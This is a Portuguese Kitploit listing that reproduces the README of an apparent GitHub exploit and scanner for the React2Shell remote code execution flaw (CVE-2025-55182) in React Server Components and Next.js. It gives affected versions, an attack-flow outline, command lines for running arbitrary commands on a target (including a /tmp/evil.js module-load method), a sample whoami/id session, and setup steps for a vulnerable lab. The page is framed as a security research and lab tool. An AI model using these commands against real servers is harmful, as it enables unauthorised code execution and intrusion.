Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — CVE-2025-55182 React RCE Test Program | Kitploit
Ferramentas/GitHubGitHub/theman001/cve-2025-55182
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubtheman001/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 React RCE Test Program

Ver Repositório
2há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 (React2Shell)

Programa de Teste RCE React CVE-2025-55182

🔒 CVE-2025-55182 Scanner RCE Interativo

Este script é uma ferramenta de verificação de vulnerabilidade direcionada à CVE-2025-55182, uma grave vulnerabilidade de execução remota de código (RCE) presente nos React Server Components (RSC) do React 19.x.

Esta ferramenta determina se a vulnerabilidade existe em um servidor real e, dependendo das opções, pode executar comandos, registrar logs ou testar com o método RCE de dois estágios (module#_load).

⚠️ Esta ferramenta deve ser usada apenas em ambientes de teste fechados para auditoria de segurança e verificação de vulnerabilidades.


📋 Resumo da Vulnerabilidade React2Shell (CVE-2025-55182)

ItemConteúdo
Número da VulnerabilidadeCVE-2025-55182 (React) / CVE-2025-66478 (Next.js)
Nome da VulnerabilidadeReact2Shell
Tipo de VulnerabilidadeExecução Remota de Código (RCE) – Autenticação não necessária
Severidade (CVSS)10.0 (Crítico)
Data de Descoberta2025-11-29 (Lachlan Davidson)
Dificuldade de AtaqueMuito Baixa (nível Log4Shell)
Descrição da VulnerabilidadeVulnerabilidade RCE estrutural que permite acesso à cadeia de protótipos (constructor, __proto__) através da notação de colchetes da função requireModule() durante a desserialização Flight

🧱 Produtos e Versões Vulneráveis

✅ Projetos com funcionalidades RSC devem atualizar também os módulos react-server-dom-* para a versão mais recente, separadamente do React, para estarem seguros.


📚 Índice

  • 🗂️ Estrutura de Diretórios
  • 🧩 Principais Recursos
  • 📦 Método de Instalação
  • 🚀 Exemplos de Execução
  • 💬 Exemplo de Entrada de Comando Interativo
  • ⚠️ Avisos de Segurança
  • 📚 Referência Técnica
  • 📄 Licença e Condições de Uso

🗂️ Estrutura de Diretórios

root@kitploit:~
CVE-2025-55182/
├── README.md                     # 전체 개요 및 스캐너 사용법
├── DETECTION_RULES.md            # 탐지/차단용 규칙 모음
├── 설명 및 탐지규칙.md             # 한글 탐지 규칙 설명
├── cve_2025_55182_interactive.py # RCE 검증 스캐너 스크립트
├── requirements.txt              # 스캐너 의존성 목록
├── setup_vulnerable_env.sh       # 취약 환경 일괄 설치 스크립트
├── uninstall_vulnerable_env.sh   # 취약 환경 정리/제거 스크립트
└── vulnerable-react-env/         # React2Shell 취약 서버 실습용 코드
    ├── README.md                 # 실습 환경 사용법
    ├── package.json              # npm 스크립트 및 의존성
    ├── server.js                 # 취약한 Express 백엔드
    ├── public/
    │   └── index.html            # CDN 기반 React 프런트엔드
    └── .gitignore

🧩 Principais Recursos

✅ Testar interativamente se o RCE é possível no servidor vulnerável
✅ Suporte aos métodos child_process#execSync (padrão) ou module#_load
✅ Salvar o resultado da execução do comando em um arquivo de log
✅ Enviar comandos de sistema digitados pelo usuário para o servidor


📦 Método de Instalação

root@kitploit:~
git clone <this-repo>
cd <this-repo>
pip install -r requirements.txt

🚀 Exemplos de Execução

  1. Teste RCE básico (método execSync)

    • Executa comandos usando child_process.execSync()
    • python cve_2025_55182_interactive.py http://localhost:3000 --rce
  2. Teste RCE de dois estágios (método module#_load)

    • Cria um arquivo JS malicioso e executa via module#_load
    • python cve_2025_55182_interactive.py http://localhost:3000 --rce --method moduleLoad
  3. Teste RCE baseado em RSC (opção --rce2)

    • Executa payload através do caminho de processamento de componentes do servidor Next.js
    • python cve_2025_55182_interactive.py http://localhost:3000 --rce2
  4. Salvar resultado da execução do comando em log

    • Salva todos os resultados de comandos no arquivo de log especificado
    • python cve_2025_55182_interactive.py http://localhost:3000 --rce --log rce_output.log

🚧 Ambiente de Laboratório com Servidor React Vulnerável (OCI/Ubuntu)

A pasta vulnerable-react-env contém um servidor React + Express intencionalmente vulnerável que reproduz o CVE-2025-55182.

  1. Configuração rápida em lote (recomendado)
    • Executar ./setup_vulnerable_env.sh completa instalação de pacotes apt → instalação do nvm/Node.js 20 → npm install de uma só vez.
    • Após a conclusão, execute o servidor com cd vulnerable-react-env && npm start ou npm run dev.
    • ⚠️ Apenas npm run exibirá a lista de scripts. Use npm start (ou npm run start) para especificar o script.
    • Para limpar o ambiente, use ./uninstall_vulnerable_env.sh para remover node_modules, payloads do moduleLoad e (opcional) Node 20 e nvm.
    • ❗️ Se houver erros de dependência como ERR_MODULE_NOT_FOUND: Cannot find package 'express', execute cd vulnerable-react-env && npm install para instalar node_modules e depois npm start novamente.
  2. Configuração manual (alternativa)
    • sudo apt update && sudo apt install -y curl build-essential

⚠️ Proibido uso fora de fins de pesquisa/educação. Não exponha à internet.


💬 Exemplo de Entrada de Comando Interativo

💬 Comando do sistema a ser executado: whoami
✅ Código de resposta: 200
📄 Conteúdo da resposta: {"success":true,"result":"www-data"}

💬 Comando do sistema a ser executado: id
✅ Código de resposta: 200
📄 Conteúdo da resposta: {"success":true,"result":"uid=1000(hacker) gid=1000(hacker)"}

💬 Comando do sistema a ser executado: exit
👋 Encerrando.


⚠️ Avisos de Segurança

❌ Nunca use em ambientes de produção.
✅ Este script deve ser usado apenas em ambiente de teste local ou VM isolada.
🛠️ O método --method moduleLoad cria um arquivo real em /tmp/evil.js.
🧾 Se usar a opção --log, os resultados são salvos em texto simples; restrinja o acesso ao arquivo.
🔐 Todas as requisições verificam se o código JavaScript real é executado no servidor vulnerável.


📚 Referência Técnica

  • CVE oficial: CVE-2025-55182

  • Métodos de exploit:

    1. child_process#execSync
    2. vm#runInThisContext
    3. fs#writeFileSync
    4. module#_load
  • Fluxo de ataque:

    1. Envio de multipart/form-data especial para o endpoint /formaction
    2. Chamada de requireModule() no servidor
    3. Execução de RCE através da cadeia de protótipos ou funções ligadas (bound functions)

📄 Licença e Condições de Uso

Este projeto é fornecido apenas para fins de pesquisa de segurança, auditoria e teste.
O uso não autorizado em sistemas reais é ilegal.

Toda responsabilidade legal decorrente do uso desta ferramenta é do próprio usuário.

Baixar ferramenta
Produto/FerramentaVersão VulnerávelVersão Corrigida
React.js19.0.0, 19.1.0, 19.1.1, 19.2.019.0.1, 19.1.2, 19.2.1
react-server-dom-webpackAs acima (↑)As acima
react-server-dom-parcelAs acima (↑)As acima
react-server-dom-turbopackAs acima (↑)As acima
Next.js 14Algumas versões a partir de 14.3.0.canary.77(Oficiosamente) Recomenda-se migrar para 15.0.5 ou superior
Next.js 1515.0.0 ~ 15.5.615.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 15.6.0
Next.js 1616.0.0 ~ 16.0.616.0.7
Outras ferramentasReact Router RSC, RedwoodJS, Vite RSC Plugin, Parcel RSC Plugin, etc.É necessário corrigir as dependências RSC desses projetos
  • Utilização completa (método + log)

    • Usa o método moduleLoad juntamente com o salvamento de log
    • python cve_2025_55182_interactive.py http://localhost:3000 --rce --method moduleLoad --log rce_output.log
  • Saída de depuração do payload

    • Exibe o payload no console antes de enviar ao servidor
    • python cve_2025_55182_interactive.py http://localhost:3000 --rce --debug

  • curl -fsSL https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.7/install.sh -o /tmp/install_nvm.sh && bash /tmp/install_nvm.sh
  • nvm install 20 && nvm use 20
  • cd vulnerable-react-env && npm install
  • npm start (porta padrão: 3000)
  • Experiência da vulnerabilidade
    • No navegador, acesse http://localhost:3000 e envie _payload e cmd através do formulário.
    • Ou reproduza o fluxo RCE com exemplos curl do vulnerable-react-env/README.md